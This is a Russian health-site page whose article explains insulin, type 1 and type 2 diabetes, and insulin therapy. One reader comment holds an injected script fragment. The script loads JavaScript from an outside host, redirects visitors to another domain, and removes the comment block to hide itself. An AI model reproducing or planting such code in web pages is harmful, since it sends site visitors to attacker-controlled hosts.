Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что вы знаете об инсулине...  >>  Что вы знаете об инсулине?
 
Обратная связь
 

Что вы знаете об инсулине?

Размер шрифта
22 июня 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Многие люди слово «инсулин» связывают с сахарным диабетом, на этом их познания заканчиваются. Что такое инсулин и для чего он нужен организму?

Инсулин фото

Что такое инсулин

Инсулин – это гормон, который образуется в специальных клетках поджелудочной железы. Инсулин необходим нашему организму для снижения уровня глюкозы в крови. Образование и выделение инсулина из клеток поджелудочной железы зависит от уровня глюкозы: чем он выше, тем больше инсулина поступает в кровь. Снижение уровня глюкозы в крови происходит благодаря тому, что инсулин переносит глюкозу внутрь клеток, где она используется в качества топлива для получения энергии.

Все ткани нашего организма делятся на инсулинозависимые и инсулиннезависимые. К инсулинозависимым тканям относится печень, мышцы и жировая ткань. В клетки этих тканей глюкоза может попасть только с помощью инсулина. Если в организме мало инсулина или клетки невосприимчивы к нему, то глюкоза остается в крови.

К инсулиннезависимым тканям относится эндотелий, т.е. внутренняя выстилка сосудов, нервная ткань и хрусталик глаза. Поступление глюкозы в клетки этих тканей не зависит от наличия инсулина.

Что такое сахарный диабет

Сахарный диабет – это заболевание, при котором наблюдается стойкое повышение уровня глюкозы в крови. Почему это происходит?

  • При сахарном диабете 1 типа (инсулинозависимом) клетки поджелудочной железы, в которых образуется инсулин, разрушаются. Оставшиеся клетки поджелудочной железы не могут удовлетворить потребности организма в инсулине, поэтому большая часть глюкозы не используется, а остается в крови. Этот вид сахарного диабета чаще встречается в молодом возрасте (до 30 лет).
  • При сахарном диабете 2 типа (инсулиннезависимом) клетки поджелудочной железы не страдают, и в организме находится достаточное количество инсулина. Однако клетки инсулинозависимых тканей теряют чувствительность к инсулину – развивается так называемая инсулинорезистентность.

Если представить, что инсулин – это ключик, который открывает клетку для глюкозы, то при инсулинорезистентности ключик не подходит к замку и не может открыть клетку. В результате глюкоза не поступает в клетки и остается в крови.

Сахарный диабет 2 типа развивается у людей старше 40 лет. Основным фактором риска развития заболевания является ожирение.

Лечение

Впервые инсулин был использован для лечения сахарного диабета в 1922 г. Первую инъекцию получил 14-летний Леонард Томпсон из Торонто. Благодаря нобелевским лауреатам Фредерику Бантингу и Чарльзу Бесту, которые открыли инсулин, началась новая эра в лечении сахарного диабета.

Пациенты с сахарным диабетом 1 типа должны ежедневно получать инъекции инсулина. Как правило, в их лечении комбинируются препараты короткого и длительного действия.

Препарат длительного действия используется один раз в день и предназначен для создания базовой концентрации инсулина в крови, а препарат короткого действия вводится перед каждым приемом пищи для ситуационного снижения уровня глюкозы. Такой режим дозирования позволяет имитировать работу поджелудочной железы.

Однако инъекции инсулина требуются далеко не всем пациентам с сахарным диабетом. Лечение пациентов с сахарным диабетом 2 типа начинается с немедикаментозных мероприятий: соблюдения диеты, снижения веса и увеличения физической активности. В дальнейшем используются сахароснижающие препараты, и только при истощении клеток поджелудочной железы – инсулин.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего две инъекции антител вылечат сахарный диабет!   Сиофор для похудения   Косметика вызывает диабет   Факторы риска сахарного диабета 2 типа  
09 апреля 2013Знаете ли вы ваш уровень сахара 28 августа 2012Если вы лечите диабет – будете умнее!
 
31 июля 2012Сахарный диабет можно вылечить с помощью одного укола! 29 июля 2011Мускулы могут защитить от диабета
 

Слайдшоу

1
Всего 10 секунд скажут, здорова ты или нет
Сахар – это наркотик?
Что нужно знать о сахарном диабете 2-го типа

Тесты

1
Оцените риск развития сахарного диабета
Что вы знаете о поджелудочной железе?
Есть ли у вас скрытый риск диабета?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.